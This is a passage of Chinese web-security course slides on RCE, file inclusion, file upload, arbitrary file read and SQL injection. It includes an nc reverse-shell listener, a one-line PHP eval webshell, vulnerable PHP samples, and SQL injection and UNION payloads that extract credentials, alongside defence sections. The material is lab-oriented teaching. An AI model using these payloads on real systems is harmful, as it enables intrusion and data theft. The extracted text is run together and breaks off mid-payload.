攻擊機:nc–lvp77773一句話木馬:<?php@eval($_POST['caidao']);?>本課件是可編輯的正常PPT課件3.遠程代碼執(zhí)行漏洞3.4遠程代碼執(zhí)行漏洞利用(1)反彈shell(2)一句話木馬本課件是可編輯的正常PPT課件4RCE漏洞加固1.盡量少用執(zhí)行命令的函數(shù)或直接禁用2.參數(shù)值盡量使用引號包括3.在進入執(zhí)行命令函數(shù)之前,變量一定要做好過濾,對敏感字符轉(zhuǎn)義4.在使用動態(tài)函數(shù)之前,確保使用的函數(shù)是指定的函數(shù)之一本課件是可編輯的正常PPT課件小結(jié)1.RCE漏洞定義,分類2.命令執(zhí)行漏洞的原因、利用3.代碼執(zhí)行漏洞,php系統(tǒng)函數(shù)4.
RCE漏洞加固方法本課件是可編輯的正常PPT課件作業(yè)1.利用dvwa環(huán)境,進行命令執(zhí)行漏洞利用(1)創(chuàng)建一個用戶,并加入到管理員組(win、linux)(2)win開啟3389,遠程連接(3)linux通過ssh進行連接2.利用system函數(shù)寫一個反彈shell3.利用eval函數(shù)寫一個一句話木馬本課件是可編輯的正常PPT課件THEEND謝謝!本課件是可編輯的正常PPT課件項目5:文件包含漏洞利用與防護
本課件是可編輯的正常PPT課件項目目標(biāo)知識目標(biāo):1.了解文件包含、文件包含漏洞定義2.理解文件包含漏洞的分類、文件包含函數(shù)3.掌握文件包含漏洞利用,防范措施能力目標(biāo):1.能運用文件包含漏洞獲取敏感信息以及加固方法情感目標(biāo):1.自主、開放的學(xué)習(xí)能力2.良好的自我表現(xiàn)、與人溝通能力3.良好的團隊合作精神本課件是可編輯的正常PPT課件目錄01文件包含漏洞概述02文件包含漏洞利用與防御目錄本課件是可編輯的正常PPT課件1.文件包含漏洞概述1.1文件包含在web后臺開發(fā)中,程序員往往為了提高效率以及讓代碼看起來更加簡潔,會使用包含函數(shù)功能,比如會把網(wǎng)頁引用的標(biāo)準(zhǔn)頁眉(head.php)或菜單文件寫進一個文件中,之后某個文件需要調(diào)用的時候就直接在文件頭中寫上一句<?phpincludehead.php?>.使用文件包含為開發(fā)者節(jié)省大量的時間。--當(dāng)頁眉需要更新時,您只更新一個包含文件就可以了,或者向網(wǎng)站添加一張新頁面時,僅僅需要修改一下菜單文件(而不是更新所有網(wǎng)頁中的鏈接)本課件是可編輯的正常PPT課件1.文件包含漏洞概述1.2文件包含漏洞有些時候,由于網(wǎng)站功能的需求,文件包含的代碼文件被寫成了一個變量,且這個變量可以由前端用戶傳進來,由于傳入的文件名沒有合理的校驗,或者校驗被繞過,從而操作了預(yù)想之外的文件,就可能導(dǎo)致意外的文件泄露甚至惡意的代碼注入,讀取系統(tǒng)給敏感文件。本課件是可編輯的正常PPT課件1.文件包含漏洞概述1.3文件包含代碼<?php$file=$_GET[‘file’];#將參數(shù)file的值傳遞給變量$fileinclude$file;#使用include函數(shù)包含文件?>原因分析:文件包含函數(shù)加載的參數(shù)沒有經(jīng)過過濾或者嚴格的定義,可以被用戶控制,包含其他惡意文件,導(dǎo)致了執(zhí)行了非預(yù)期的代碼。本課件是可編輯的正常PPT課件1.文件包含漏洞概述1.4PHP文件包含函數(shù)大部分文件包含的漏洞都出現(xiàn)在php的程序中,因PHP語言提供的文件包含功能太強大,太靈活。(1)include():包含過程中如果出現(xiàn)錯誤,會拋出一個警告,程序繼續(xù)正常執(zhí)行。(2)include_once():同include,只包含一次。(3)require():包含過程中如果出現(xiàn)錯誤,會退出程序的執(zhí)行。(4)require_once():同require,只包含一次。使用與在腳本執(zhí)行期間同一個文件有可能被包括超過一次的情況下,你想確保它只被包含一次以避免函數(shù)重定義、變量重定義賦值等問題。本課件是可編輯的正常PPT課件1.文件包含漏洞概述1.5文件包含漏洞分類根據(jù)不同的配置環(huán)境,文件包含漏洞分為如下兩種情況:(1)本地文件包含:當(dāng)被包含的文件在服務(wù)器本地(2)遠程文件包含:當(dāng)被包含的文件在遠程服務(wù)器遠程文件包含條件:在php.ini文件中allow_url_fopen=on#默認打開allow_url_include=on#默認關(guān)閉本課件是可編輯的正常PPT課件1.文件包含漏洞概述1.5.1本地文件包含用戶Webserver:../../php/php.ini(敏感文件/系統(tǒng)配置文件)本課件是可編輯的正常PPT課件1.文件包含漏洞概述1.5.2遠程文件包含用戶Webserver:遠程包含本課件是可編輯的正常PPT課件目錄01文件包含漏洞概述02文件包含漏洞利用與防御目錄本課件是可編輯的正常PPT課件2.文件包含漏洞利用與防御2.1文件包含漏洞利用1.本地文件包含2.遠程文件包含3.文件上傳+文件包含綜合利用本課件是可編輯的正常PPT課件2文件包含漏洞利用與防御2.2文件包含漏洞防御(1)在功能設(shè)計上盡量不要將文件包含函數(shù)對應(yīng)的文件放給前端進行選擇和操作(2)過濾各種../../,http://,https://(3)配置php.ini配置文件allow_url_fopen=offallow_url_include=offmagic_quotes_gpc=on(4)通過白名單策略,僅允許包含運行指定的文件,其他的都禁止本課件是可編輯的正常PPT課件小結(jié)1.文件包含漏洞的定義、分類2.文件包含漏洞的利用3.文件包含漏洞加固本課件是可編輯的正常PPT課件作業(yè)1.利用本地文件包含漏洞讀取目標(biāo)系統(tǒng)敏感文件2.利用文件上傳+文件包含漏洞寫入webshell本課件是可編輯的正常PPT課件THEEND謝謝!本課件是可編輯的正常PPT課件項目6:文件上傳漏洞利用與防護
本課件是可編輯的正常PPT課件項目目標(biāo)知識目標(biāo):1.了解文件上傳漏洞的概念、原因、危害2.理解文件上傳漏洞的測試流程3.掌握文件上傳漏洞的利用與防御措施能力目標(biāo):1.能夠利用文件上傳漏洞,控制web服務(wù)器情感目標(biāo):1.自主、開放的學(xué)習(xí)能力2.良好的自我表現(xiàn)、與人溝通能力3.良好的團隊合作精神本課件是可編輯的正常PPT課件目錄01文件上傳漏洞概述02文件上傳漏洞利用與防御目錄本課件是可編輯的正常PPT課件1.1文件上傳文件上傳功能在web應(yīng)用系統(tǒng)很常見,因為業(yè)務(wù)功能需要,很多web站點都有文件上傳的接口,比如(1)注冊時上傳頭像圖片(jpg,png,gif等)(2)上傳文件附件(doc,xls等)當(dāng)用戶點擊上傳按鈕后,后臺會對上傳的文件進行判斷比如是否是指定的類型、后綴名、大小等等,然后將其按照設(shè)計的格式進行重命名后存儲在指定的目錄。1.文件上傳漏洞概述本課件是可編輯的正常PPT課件1.2文件上傳漏洞在進行文件上傳功能的時候,而在后臺對上傳的文件沒有進行安全考慮或者采用了有缺陷的措施,導(dǎo)致攻擊者可以通過一些手段繞過安全措施從而上傳一些惡意的文件,比如一句話木馬,從而通過對該惡意文件的訪問來控制整個web后臺。文件上傳漏洞可以說是日常滲透測試中用得最多的一個漏洞,用它獲得服務(wù)器權(quán)限最快最直接(高危漏洞)。1.文件上傳漏洞概述本課件是可編輯的正常PPT課件1.文件上傳漏洞概述1.3文件上傳漏洞危害(1)上傳文件是病毒或木馬時,可以誘騙用戶下載執(zhí)行或者自動執(zhí)行。(2)上傳文件是webshell時,攻擊者可通過這些網(wǎng)頁后門執(zhí)行命令(3)上傳文件是惡意圖片時,圖片中可能包含了腳本,加載或者點擊這些圖片時腳本會執(zhí)行……本課件是可編輯的正常PPT課件1.文件上傳漏洞概述1.4文件上傳漏洞原因(1)文件上傳檢查不嚴:沒有檢查或者客戶端檢查(2)文件上傳后修改文件名處理不當(dāng):允許已經(jīng)上傳的文件進行重命名(3)使用第三方插件引入:例如著名的博客平臺wordpress就有豐富的插件,而這些插件中每年都會被挖掘出大量的文件上傳漏洞。本課件是可編輯的正常PPT課件1.文件上傳漏洞概述1.5文件上傳漏洞測試流程(1)對文件上傳的地方按照要求上傳文件,查看返回結(jié)果(路徑,提示等);(2)嘗試上傳不同類型的“惡意文件”,比如php文件,分析結(jié)果;(3)查看html源碼,看是否通過js在前端做了上傳限制,可以繞過;(4)嘗試使用不同方式進行繞過,黑白名單繞過/MIME繞過/0x00階段繞過等;(5)測試或者結(jié)合其它漏洞(比如文件包含等)得到木馬,連接測試。本課件是可編輯的正常PPT課件目錄01文件上傳漏洞概述02文件上傳漏洞利用與防御目錄本課件是可編輯的正常PPT課件2.文件上傳漏洞利用與防御2.1文件上傳漏洞利用1.客戶端javascript檢測繞過2.服務(wù)端MIME類型檢測繞過3.服務(wù)端getimagesize檢測繞過4.up-lab文件上傳實驗本課件是可編輯的正常PPT課件2.文件上傳漏洞利與防御2.2文件上傳漏洞防御(1)不要在前端使用js實施上傳限制策略(2)通過服務(wù)端對文件上傳文件進行限制
(2.1)進行多條件組合檢查:比如文件大小,路徑,擴展名,文件類型,文件完整性(2.2)對上傳的文件在服務(wù)器上存儲時進行重命名(制定合理的命名規(guī)則)(2.3)對服務(wù)端上傳的目錄進行權(quán)限控制(比如只讀),限制執(zhí)行權(quán)限帶來的危害。本課件是可編輯的正常PPT課件小結(jié)1.文件上傳漏洞的概念、原因、危害、測試流程2.文件上傳漏洞的利用與防御措施本課件是可編輯的正常PPT課件作業(yè)1.客戶端javascript檢測繞過2.服務(wù)端MIME類型檢測繞過3.服務(wù)端getimagesize檢測繞過4.up-lab實驗選做本課件是可編輯的正常PPT課件項目7:文件下載漏洞利用與防護
本課件是可編輯的正常PPT課件項目目標(biāo)知識目標(biāo):1.了解任意文件讀取的概念,利用條件,危害2.掌握任意文件讀取漏洞的利用3.掌握任意文件讀取漏洞加固能力目標(biāo):1.能夠利用任意文件讀取漏洞并對該漏洞進行防御情感目標(biāo):1.自主、開放的學(xué)習(xí)能力2.良好的自我表現(xiàn)、與人溝通能力3.良好的團隊合作精神本課件是可編輯的正常PPT課件1.任意文件讀取漏洞概述1.1任意文件讀取漏洞一些網(wǎng)站由于業(yè)務(wù)需求,往往需要提供文件查看或文件下載功能,但若對用戶查看或下載的文件不做限制,則惡意用戶就能夠查看或下載任意敏感文件,這就是任意文件讀取漏洞。本課件是可編輯的正常PPT課件1.任意文件讀取漏洞概述1.2漏洞危害(1)下載服務(wù)器任意文件,如腳本代碼、服務(wù)及系統(tǒng)配置文件等(2)可用得到的代碼進一步代碼審計,得到更多可利用漏洞本課件是可編輯的正常PPT課件1.任意文件讀取漏洞概述1.3漏洞利用條件(1)存在讀文件的函數(shù)(2)讀取文件的路徑用戶可控且未校驗或校驗不嚴(3)輸出了文件內(nèi)容本課件是可編輯的正常PPT課件1.任意文件讀取漏洞概述1.4PHP任意讀取文件函數(shù)file_get_contents()fopen()readfile
fread
fgets
fgetss
fpassthru
parse_ini_file
漏洞示例代碼<?php
$filename
=
$_GET['file'];
if(isset($filename)){
readfile($filename);
}?>漏洞示例代碼<?php$filename=$_GET['filename'];echofile_get_contents($filename);?>漏洞示例代碼<?php$filename="test.txt";$fp=fopen($filename,"r")ordie(“noopen!");$data=fread($fp,filesize($filename));fclose($fp);echo$data;?>本課件是可編輯的正常PPT課件2任意文件讀取漏洞利用與加固2.1漏洞利用1.利用任意文件讀取漏洞下載/etc/passwd敏感文件本課件是可編輯的正常PPT課件2任意文件讀取漏洞利用與加固2.2漏洞加固1.對傳入的文件名進行嚴格的過濾和限定2.對文件下載的目錄進行嚴格的限定本課件是可編輯的正常PPT課件小結(jié)1.任意文件讀取的原理2.任意文件讀取漏洞的利用與加固本課件是可編輯的正常PPT課件作業(yè)1.讀取敏感文件2.任意文件下載本課件是可編輯的正常PPT課件項目8:SQL注入漏洞利用與防護
本課件是可編輯的正常PPT課件項目目標(biāo)知識目標(biāo):1.了解SQL注入漏洞的基本概念、危害,分類2.理解SQL注入漏洞的測試流程、測試字符串3.掌握數(shù)據(jù)庫的基本操作4.掌握手工注入&工具注入5.掌握SQL注入漏洞的利用與加固能力目標(biāo):1.能利用SQL注入漏洞獲取目標(biāo)靶機數(shù)據(jù)情感目標(biāo):1.自主、開放的學(xué)習(xí)能力2.良好的自我表現(xiàn)、與人溝通能力3.良好的團隊合作精神本課件是可編輯的正常PPT課件1.SQL注入漏洞概述1.1SQL注入漏洞及形成原因定義:SQL注入即是指web應(yīng)用程序?qū)τ脩糨斎霐?shù)據(jù)的合法性沒有判斷,攻擊者可以在web應(yīng)用程序中事先定義好的查詢語句的結(jié)尾上添加額外的SQL語句,以此來實現(xiàn)欺騙數(shù)據(jù)庫服務(wù)器執(zhí)行非授權(quán)的任意查詢,從而進一步得到相應(yīng)的數(shù)據(jù)信息。原因:SQL注入漏洞主要形成的原因是在數(shù)據(jù)交互中,前端的數(shù)據(jù)傳入到后臺處理時,沒有做嚴格的判斷,導(dǎo)致其傳入的“數(shù)據(jù)”拼接到SQL語句中后,被當(dāng)作SQL語句的一部分執(zhí)行。從而導(dǎo)致數(shù)據(jù)庫受損(被脫褲、被刪除、甚至整個服務(wù)器權(quán)限淪陷)。本課件是可編輯的正常PPT課件1.SQL注入漏洞概述1.2SQL注入漏洞及形成原因Sql注入漏洞形成原因,主要是開發(fā)人員在構(gòu)建代碼時,沒有對輸入邊界進行安全考慮,導(dǎo)致攻擊者可以通過合法的輸入點提交一些精心構(gòu)造的語句,從而欺騙后臺數(shù)據(jù)庫對其進行執(zhí)行,導(dǎo)致數(shù)據(jù)庫信息泄露。非法輸入:id=1or1=1select*fromproductwhereid=1or1=1正常輸入:id=1select*fromproductwhereid=1本課件是可編輯的正常PPT課件1.SQL注入漏洞概述1.3SQL注入漏洞危害(1)數(shù)據(jù)庫信息泄露:數(shù)據(jù)庫中存放的用戶的隱私信息的泄露(2)網(wǎng)頁篡改:通過操作數(shù)據(jù)庫對特定問也進行篡改(3)網(wǎng)站被掛馬,傳播惡意軟件:修改數(shù)據(jù)庫一些字段的值,進行掛馬攻擊?!?本課件是可編輯的正常PPT課件1.SQL注入漏洞概述1.4SQL注入攻擊流程第一步:注入點探測
自動方式:使用web漏洞掃描工具,自動進行注入點發(fā)現(xiàn)
手動方式:手工構(gòu)造sql注入語句進行注入點發(fā)現(xiàn)第二步:信息獲取
通過注入點取期望得到的數(shù)據(jù)
環(huán)境信息:數(shù)據(jù)庫類型,數(shù)據(jù)庫版本,操作系統(tǒng)版本,用戶信息等
數(shù)據(jù)庫信息:數(shù)據(jù)庫名稱,數(shù)據(jù)庫表,表字段,字段內(nèi)容第三步:獲取權(quán)限
獲取操作系統(tǒng)權(quán)限,通過數(shù)據(jù)庫執(zhí)行shell,上傳木馬本課件是可編輯的正常PPT課件1.SQL注入漏洞概述1.5SQL注入測試字符串or1=1--
'or1=1--
xx%’or1=1--“or1=1--)or1=1--')or1=1--")or1=1--"))or1=1--………..--可以用#替換,url提交過程中Url編碼后的#為%23本課件是可編輯的正常PPT課件1.SQL注入漏洞概述$conn=mysql_connect($host,$username,$password);$query=”select*fromuserswhereuser=’admin’andpasswd=’”;$query=$query.$_GET[“passwd”]”’”;$result=mysql_query($query);#######################################################################正常的數(shù)據(jù):passwd=admin888、passwd=test123后臺所執(zhí)行的語句:Select*fromuserswhereuser=’admin’andpasswd=’admin888’–登陸成功Select*fromuserswhereuser=’admin’andpasswd=’test123’–登陸失敗帶有惡意代碼的數(shù)據(jù):passwd=’
or1=1#此時后臺執(zhí)行語句為:Select*fromuserswhereuser=’admin’andpasswd=‘a(chǎn)dmin’or1=1#’–登陸成功本課件是可編輯的正常PPT課件1.SQL注入漏洞概述1.6SQL注入漏洞位置(1)登陸框(2)搜索框(3)url參數(shù)值(4)信息設(shè)置只要是后臺數(shù)據(jù)庫操作的地方,都有可能有注入本課件是可編輯的正常PPT課件2.數(shù)據(jù)庫基礎(chǔ)2.1數(shù)據(jù)庫概念數(shù)據(jù)庫:長期儲存在計算機內(nèi)的,有組織的,可共享的數(shù)據(jù)集合。DMBS:如何組織和存儲數(shù)據(jù)庫中的數(shù)據(jù),如何有效地獲取和維護這些數(shù)據(jù)。完成這個任務(wù)的程序(軟件)叫數(shù)據(jù)庫管理系統(tǒng)(DataBaseManagementSystem:DMBS)DBMSDatabase程序數(shù)據(jù)庫用戶請求本課件是可編輯的正常PPT課件2.數(shù)據(jù)庫基礎(chǔ)2.2常用的數(shù)據(jù)庫mysql,oracle,SQLServer等2.3常用的數(shù)據(jù)庫結(jié)構(gòu)庫->表->字段,采用結(jié)構(gòu)化查詢語言(SQL)select
列名稱1,列名稱2
from表名稱deletefrom表名稱where
列名稱=值update
表名稱
set列名稱=新值where列名稱=某值insertinto表名(列1,列2,……)values(值1,值2,……)本課件是可編輯的正常PPT課件2.數(shù)據(jù)庫基礎(chǔ)2.2常用的數(shù)據(jù)庫mysql,oracle,SQLServer等2.3常用的數(shù)據(jù)庫結(jié)構(gòu)庫->表->字段,采用結(jié)構(gòu)化查詢語言(SQL)本課件是可編輯的正常PPT課件2.數(shù)據(jù)庫基礎(chǔ)2.4常用的數(shù)據(jù)庫操作登錄數(shù)據(jù)庫:mysql–uroot–p****顯示數(shù)據(jù)庫:showdatabases;使用數(shù)據(jù)庫:use數(shù)據(jù)庫名;顯示表名稱:showtables;查看表的字段:desc表名稱;select
列名稱1,列名稱2
from表名稱查詢數(shù)據(jù)庫:selectdatabase();
查詢用戶:selectuser();查詢版本:selectversion()deletefrom表名稱where
列名稱=值update
表名稱
set列名稱=新值where列名稱=某值insertinto表名(列1,列2,……)values(值1,值2,……)本課件是可編輯的正常PPT課件3.SQL注入漏洞分類根據(jù)注入點類型不同,分為(1)整數(shù)型user_id=$id(2)字符型user_id=’$id’
(3)搜索型textlike“%{$_GET[‘search’]}%”(4)其他類型
不管是那種類型的注入的,總而言之,就是對sql中的各種類型的輸入進行閉合測試,構(gòu)造合法的sql,欺騙后臺的執(zhí)行。只要我們猜測后臺的語句是怎么來拼接的,然后去構(gòu)造閉合。本課件是可編輯的正常PPT課件4.union聯(lián)合查詢4.1union操作符union操作符:用于合并兩個或多個select語句的結(jié)果集。在mysql數(shù)據(jù)庫或其他關(guān)系型數(shù)據(jù)庫里面都提供了這樣的一個方法。4.2用法舉例selectusername,passwordfromuserwhereid=1unionselect字段1,字段2from表名注意,union內(nèi)部的每個select語句必須擁有相同數(shù)量的列。mysql>selectid,usernamefrommemberunionselectpw,email,idfrommemberwhereid=2;ERROR1222(21000):TheusedSELECTstatementshaveadifferentnumberofcolumns本課件是可編輯的正常PPT課件4.union聯(lián)合查詢4.1union操作符union操作符:用于合并兩個或多個select語句的結(jié)果集。在mysql數(shù)據(jù)庫或其他關(guān)系型數(shù)據(jù)庫里面都提供了這樣的一個方法。4.2用法舉例selectusername,passwordfromuserwhereid=1unionselect字段1,字段2from表名注意,union內(nèi)部的每個select語句必須擁有相同數(shù)量的列。mysql>selectid,usernamefrommemberunionselectpw,email,idfrommemberwhereid=2;ERROR1222(21000):TheusedSELECTstatementshaveadifferentnumberofcolumns本課件是可編輯的正常PPT課件4.union聯(lián)合查詢思考題當(dāng)我們用union聯(lián)合查詢的時候,我們并不知道后臺的數(shù)據(jù)庫里面查詢了幾個字段,怎么解決這個問題?采用orderby語句本課件是可編輯的正常PPT課件4.union聯(lián)合查詢4.3
orderby(1)orderbyn對查詢的結(jié)果進行排序,按照第n列進行排序,n數(shù)字是1-9,字母是a-z。(2)orderby語句用于根據(jù)指定的列對結(jié)果集進行排序。如果指定的列不存在,數(shù)據(jù)庫會報錯,通過報錯判斷查詢結(jié)果的列數(shù),從而確定主查詢的字段數(shù)。mysql>selectid,usernamefrommemberorderby2;mysql>selectid,usernamefrommemberorderby3;ERROR1054(42S22):Unknowncolumn'3'in'orderclause'本課件是可編輯的正常PPT課件4.union聯(lián)合查詢4.4
獲取數(shù)據(jù)庫基礎(chǔ)信息Step1:用orderby猜測獲取幾列數(shù)據(jù)Payload:xx’order
by
5#Step2:獲取數(shù)據(jù)庫基礎(chǔ)信息Payload:kobe'unionselectdatabase(),user()#本課件是可編輯的正常PPT課件5.information_schema數(shù)據(jù)庫5.1information_schema數(shù)據(jù)庫在mysql中,自帶的information_schema這個表里面存放了大量的重要信息。如果存在注入點的話,可以直接嘗試對該數(shù)據(jù)庫進行訪問,從而獲取更多的信息。(1)SCHEMATA表:提供了當(dāng)前mysql實例中所有數(shù)據(jù)庫的信息。showdatabases的結(jié)果取自此表。(2)TABLES表:提供了關(guān)于數(shù)據(jù)庫中表的信息(包括視圖),詳細表述了某個表屬于哪個schema,表類型,創(chuàng)建時間等信息。是showtablesfromschmename的結(jié)果取自此表。(3)COLUMNS表:提供了表中的列的信息,詳細表述了某張表所有列以及每個列的信息,是Showcolumnsfromschemaname.tablename的結(jié)果取自此表。本課件是可編輯的正常PPT課件5.information_schema數(shù)據(jù)庫1.獲取表名mysql>selectid,emailfrommemberwhereusername='kobe'unionselecttable_schema,table_namefrominformation_schema.tableswheretable_schema='pikachu’;Payload:kobe'unionselecttable_schema,table_namefrominformation_schema.tableswheretable_schema='pikachu'#2.獲取列名mysql>selectid,emailfrommemberwhereusername='kobe'unionselecttable_name,column_namefrominformation_schema.columnswheretable_name='users’;Payload:kobe'unionselecttable_name,column_namefrominformation_schema.columnswheretable_name='users'#3.獲取內(nèi)容mysql>selectid,emailfrommemberwhereusername='kobe'unionselectusername,passwordfromusers;Pa
溫馨提示
- 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負責(zé)。
- 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時也不承擔(dān)用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。
最新文檔
- 醫(yī)院入職合同范本
- 倉儲承諾合同范本
- 三年級口算題庫匯編1000道
- 二年級口算題目全集100道
- 2025云南省安全員C證考試題庫
- 出售注塑設(shè)備合同范本
- 單位電腦租賃合同范本
- 卡車鋼板采購合同范本
- 2025河北省安全員知識題庫及答案
- 生物降解材料市場推廣總結(jié)
- XX攔河堰工程施工組織設(shè)計
- GB/T 9787-1988熱軋等邊角鋼尺寸、外形、重量及允許偏差
- GB/T 7031-2005機械振動道路路面譜測量數(shù)據(jù)報告
- 馬工程教材《公共財政概論》PPT-第十二章 財政體制
- GB/T 23457-2009預(yù)鋪/濕鋪防水卷材
- GB/T 17614.1-2015工業(yè)過程控制系統(tǒng)用變送器第1部分:性能評定方法
- 財務(wù)工作督導(dǎo)檢查記錄表
- 輿情大數(shù)據(jù)監(jiān)測平臺建設(shè)方案
- 先天性腎上腺皮質(zhì)增生癥(CAH)課件
- 水利工程設(shè)計變更表格
- 畢業(yè)設(shè)計(論文)-巴哈賽車懸架系統(tǒng)設(shè)計
評論
0/150
提交評論